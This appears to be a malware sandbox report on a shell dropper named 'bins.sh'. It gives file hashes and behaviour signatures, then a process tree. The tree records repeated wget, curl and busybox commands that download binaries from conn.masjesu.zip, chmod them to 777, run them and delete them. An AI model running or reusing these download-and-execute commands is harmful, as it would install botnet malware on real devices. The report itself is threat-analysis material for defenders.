Analysis
-
max time kernel
416s -
max time network
419s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
16/12/2024, 04:16
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
7c06e835a83b81914ba9a19c15e66d76
-
SHA1
bc618204890c0b179a00d6d253001a6e27197aa1
-
SHA256
cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
-
SHA512
4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2
-
SSDEEP
192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 983 chmod 912 chmod 927 chmod 948 chmod 785 chmod 819 chmod 736 chmod 877 chmod 969 chmod 955 chmod 809 chmod 884 chmod 905 chmod 962 chmod 990 chmod 898 chmod 920 chmod 941 chmod 856 chmod 870 chmod 891 chmod 934 chmod 997 chmod 743 chmod 758 chmod 830 chmod 1004 chmod 976 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA 737 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX 744 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht 760 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO 786 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O 810 lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj 820 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p 831 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf 857 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE 871 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J 878 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 885 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ 892 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen 899 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ 906 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J 913 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 921 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE 928 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen 935 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ 942 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ 949 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX 956 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht 963 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO 970 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA 977 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj 984 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p 991 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf 998 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O 1005 lAKMISeUV2PhSu0DN3bVycJibusAQif91O -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 842 curl 887 wget 911 busybox 968 busybox 982 busybox 1001 curl 945 curl 952 curl 808 busybox 823 curl 890 busybox 902 curl 916 curl 924 curl 975 busybox 996 busybox 822 wget 862 wget 897 busybox 987 curl 723 curl 740 curl 771 curl 791 wget 894 wget 954 busybox 712 wget 739 wget 940 busybox 979 wget 742 busybox 835 wget 930 wget 947 busybox 801 curl 812 wget 881 curl 895 curl 958 wget 973 curl 888 curl 938 curl 972 wget 1000 wget 747 curl 852 busybox 869 busybox 901 wget 915 wget 961 busybox 908 wget 926 busybox 931 curl 959 curl 986 wget 919 busybox 933 busybox 993 wget 735 busybox 873 wget 944 wget 1003 busybox 755 busybox 780 busybox -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ curl File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen curl File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ curl File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX curl File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht curl File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE curl File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ curl File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht curl File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O curl File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen curl File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA curl File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf curl File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA curl File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf curl File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O curl File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ curl File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J curl File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO curl File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj curl File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX curl File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO curl File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p curl File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J curl File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 curl File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p curl File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE curl File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:712
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:735
-
-
/bin/chmodchmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:738
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:739
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:763
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵PID:764
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:780
-
-
/bin/chmodchmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- System Network Configuration Discovery
PID:791
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O./lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:818
-
-
/bin/chmodchmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:821
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:822
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵PID:827
-
-
/bin/chmodchmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵PID:834
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:835
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- System Network Configuration Discovery
PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:876
-
-
/bin/chmodchmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:883
-
-
/bin/chmodchmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:897
-
-
/bin/chmodchmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵PID:904
-
-
/bin/chmodchmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN82⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:944
-
-
